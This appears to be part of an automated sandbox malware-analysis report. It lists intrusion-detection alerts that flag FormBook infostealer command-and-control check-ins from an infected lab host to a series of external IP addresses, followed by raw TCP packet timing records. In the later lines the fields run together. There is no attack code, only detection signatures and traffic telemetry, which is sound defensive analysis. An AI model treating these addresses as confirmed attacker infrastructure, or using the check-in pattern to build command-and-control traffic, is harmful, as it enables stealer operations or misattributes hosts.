2024-11-01T09:17:52.985977+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62633 | 3.33.130.190 | 80 | TCP
2024-11-01T09:17:52.985977+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62633 | 3.33.130.190 | 80 | TCP
2024-11-01T09:18:08.753198+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62694 | 172.67.131.32 | 80 | TCP
2024-11-01T09:18:11.271335+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62710 | 172.67.131.32 | 80 | TCP
2024-11-01T09:18:13.849533+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62726 | 172.67.131.32 | 80 | TCP
2024-11-01T09:18:16.416013+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62737 | 172.67.131.32 | 80 | TCP
2024-11-01T09:18:16.416013+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62737 | 172.67.131.32 | 80 | TCP
2024-11-01T09:18:23.679834+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62773 | 103.191.208.137 | 80 | TCP
2024-11-01T09:18:26.278057+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62789 | 103.191.208.137 | 80 | TCP
2024-11-01T09:18:28.819040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62805 | 103.191.208.137 | 80 | TCP
2024-11-01T09:18:31.975253+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62821 | 103.191.208.137 | 80 | TCP
2024-11-01T09:18:31.975253+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62821 | 103.191.208.137 | 80 | TCP
2024-11-01T09:18:46.803393+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62903 | 3.33.130.190 | 80 | TCP
2024-11-01T09:18:48.488897+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62908 | 3.33.130.190 | 80 | TCP
2024-11-01T09:18:51.052223+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62909 | 3.33.130.190 | 80 | TCP
2024-11-01T09:18:54.500417+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62910 | 3.33.130.190 | 80 | TCP
2024-11-01T09:18:54.500417+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62910 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:00.170351+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62911 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:02.751946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62912 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:05.308699+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62913 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:10.801113+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62914 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:10.801113+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62914 | 3.33.130.190 | 80 | TCP
2024-11-01T09:19:17.040909+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62915 | 38.47.232.160 | 80 | TCP
2024-11-01T09:19:19.710329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62916 | 38.47.232.160 | 80 | TCP
2024-11-01T09:19:22.334592+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62917 | 38.47.232.160 | 80 | TCP
2024-11-01T09:19:25.033196+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62918 | 38.47.232.160 | 80 | TCP
2024-11-01T09:19:25.033196+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 62918 | 38.47.232.160 | 80 | TCP
2024-11-01T09:19:32.600217+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62919 | 34.92.109.131 | 80 | TCP
2024-11-01T09:19:35.240845+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62920 | 34.92.109.131 | 80 | TCP
2024-11-01T09:19:37.693971+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 62921 | 34.92.109.131 | 80 | TCP
2024-11-01T09:19:40.303371+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 62922 | 34.92.109.131 | 80 | TCP
                                                                                                                      2024-11-01T09:19:40.303371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46292234.92.109.13180TCP
                                                                                                                      2024-11-01T09:19:46.130370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462923162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:48.691019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462924162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:51.325066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462925162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:53.887832+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462926162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:53.887832+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462926162.0.211.14380TCP
                                                                                                                      2024-11-01T09:19:59.940856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462927195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:02.478341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462928195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:05.087084+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462929195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:07.678371+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462930195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:07.678371+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462930195.110.124.13380TCP
                                                                                                                      2024-11-01T09:20:13.788073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462931185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:16.409534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462932185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:18.868973+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462933185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:21.368464+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462934185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:21.368464+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462934185.68.16.9480TCP
                                                                                                                      2024-11-01T09:20:27.968512+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462935163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:30.492452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462936163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:33.034157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462937163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:35.599498+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462938163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:35.599498+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462938163.44.176.1280TCP
                                                                                                                      2024-11-01T09:20:41.499262+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462939199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:44.002826+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462940199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:46.584377+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462941199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:49.147633+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462942199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:49.147633+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462942199.59.243.22780TCP
                                                                                                                      2024-11-01T09:20:56.334843+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462943103.233.82.5880TCP
                                                                                                                      2024-11-01T09:20:58.897359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462944103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:02.477011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.462945103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:05.553474+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.462946103.233.82.5880TCP
                                                                                                                      2024-11-01T09:21:05.553474+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.462946103.233.82.5880TCP
                                                                                                                      Nov 1, 2024 09:18:51.052109003 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:51.052222967 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:51.928400040 CET6290980192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:51.933284044 CET80629093.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:52.948890924 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.953991890 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:52.957072020 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.964891911 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:52.969878912 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.499588013 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.500185013 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:54.500416994 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:54.505040884 CET6291080192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:54.509808064 CET80629103.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:59.530373096 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.536154032 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:18:59.536217928 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.577398062 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:18:59.582214117 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:00.170298100 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:00.170351028 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:01.111423969 CET6291180192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:01.116297007 CET80629113.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.118617058 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.123553991 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.123734951 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.134051085 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:02.138969898 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.751804113 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:02.751945972 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:03.650130987 CET6291280192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:03.656512022 CET80629123.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.667897940 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.672897100 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.673026085 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.688930988 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:04.693809032 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693835974 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693846941 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.693898916 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698493004 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698503971 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698512077 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698520899 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:04.698530912 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:05.308593035 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:05.308698893 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:06.193968058 CET6291380192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:06.198801041 CET80629133.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:07.214930058 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.219769955 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:07.220958948 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.227822065 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:07.232705116 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.800127029 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.800754070 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:10.801112890 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:10.803416967 CET6291480192.168.2.43.33.130.190
                                                                                                                      Nov 1, 2024 09:19:10.808243990 CET80629143.33.130.190192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:15.987472057 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:15.992343903 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:15.992424965 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:16.003429890 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:16.008690119 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:16.992831945 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:17.040909052 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:17.200125933 CET806291538.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:17.200227976 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:17.506495953 CET6291580192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.551973104 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.556848049 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:18.556956053 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.616914034 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.621898890 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.591402054 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.710329056 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:19.799519062 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.799567938 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:20.115910053 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.263226032 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.268105984 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.268292904 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.343086004 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.348035097 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348054886 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348072052 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348079920 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348088980 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348098993 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348216057 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348232031 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348252058 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.270983934 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.334592104 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:22.477252960 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.477363110 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:22.850294113 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.876532078 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.881380081 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:23.881484032 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.900376081 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.905195951 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:24.847829103 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:25.032977104 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:25.033195972 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:25.034111023 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:25.039031982 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:31.543005943 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.547830105 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:31.547905922 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.561894894 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.566771984 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.502451897 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.600217104 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:32.682605982 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.682686090 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:33.069350958 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.088073015 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.093000889 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:34.093099117 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.106338024 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.111258030 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.070667028 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.240844965 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:35.246803999 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.248951912 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:35.616111994 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.634793043 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.639648914 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.639913082 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.650254011 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.655131102 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655157089 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655213118 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655225039 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655252934 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655276060 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655353069 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655364990 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655410051 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.584239960 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.693970919 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:37.764542103 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.764599085 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:38.162842035 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.198966980 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.204051018 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:39.204207897 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.213932991 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.218879938 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:40.158385038 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:40.303370953 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:40.339020014 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:34.736615896 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599164963 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599276066 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599498034 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.737529039 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.737634897 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.738507986 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.745183945 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:40.828983068 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.833959103 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:40.834150076 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.844985962 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.849843979 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499006033 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499053001 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499262094 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:41.530648947 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.530877113 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:42.350344896 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.368992090 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.376570940 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:43.376743078 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.388987064 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.393913984 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002643108 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002721071 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002767086 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002825975 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:44.004986048 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:44.899070024 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.946830034 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.951877117 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.951962948 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.985119104 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.990144968 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990196943 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990253925 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990282059 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990309954 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990338087 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990364075 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990396023 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990422964 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584163904 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584322929 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584377050 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:46.584707022 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:46.584754944 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:47.490987062 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.517358065 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.522377014 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:48.522485018 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.531167984 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:48.536046028 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147416115 CET8062942199.59.243.227192.168.2.4
